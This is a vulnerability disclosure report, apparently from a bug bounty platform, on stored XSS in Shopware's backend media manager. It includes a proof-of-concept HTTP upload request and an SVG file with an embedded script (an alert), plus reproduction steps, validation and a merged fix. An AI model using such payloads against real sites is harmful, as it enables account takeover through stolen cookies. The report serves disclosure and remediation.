Cross-site Scripting (XSS) - Stored in shopware/shopware

Valid

Reported on

Oct 21st 2021


Description

Stored XSS when add media file with format .svg allows for arbitrary execution of JavaScript

Proof of Concept

// PoC.req
POST /shopware/backend/mediaManager/upload?albumID=-10 HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:94.0) Gecko/20100101 Firefox/94.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
X-CSRF-Token: csg3oKEcHNmgEdB24knhLLytehNmjM
Content-Type: multipart/form-data; boundary=---------------------------367191271335403183881640469954
Content-Length: 616
Origin: http://localhost
Connection: close
Referer: http://localhost/shopware/backend/
Cookie: SHOPWAREBACKEND=rvvfnl2lqenomnamav36qjhfci; __csrf_token-1=TXiREiyO1NmIg9a1wZ54z9gmJJjmzd; session-1=ko6qb8cc680feakct3snd9hj3j; lastCheckSubscriptionDate=21102021; session-1=tgmp6fsh4u75nfl13a8alt7cop; shop=1
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin

-----------------------------367191271335403183881640469954
Content-Disposition: form-data; name="fileId"; filename="123.svg"
Content-Type: image/svg+xml

<?xml version="1.0" standalone="no"?>
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">

<svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">
   <rect width="300" height="100" style="fill:rgb(0,0,255);stroke-width:3;stroke:rgb(0,0,0)" />
   <script type="text/javascript">
      alert("XSS");
   </script>
</svg>
-----------------------------367191271335403183881640469954--

Step to Reproduct

Create a file .svg contain payload

Example

<?xml version="1.0" standalone="no"?>
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">

<svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">
   <rect width="300" height="100" style="fill:rgb(0,0,255);stroke-width:3;stroke:rgb(0,0,0)" />
   <script type="text/javascript">
      alert("XSS");
   </script>
</svg>

Goto Media Management choose to Add media

The XSS will trigger when access file url

Impact

This vulnerability has the potential to steal a user's cookie and gain unauthorized access to that user's account through the stolen cookie.

lethanhphuc submitted a
a month ago
lethanhphuc
a month ago

Researcher


PRs for fix issue : https://github.com/shopware/shopware/pull/2454

Michael Telgmann validated this vulnerability a month ago
lethanhphuc has been awarded the disclosure bounty
The fix bounty is now up for grabs
Michael Telgmann confirmed that a fix has been merged on 37213e a month ago
The fix bounty has been dropped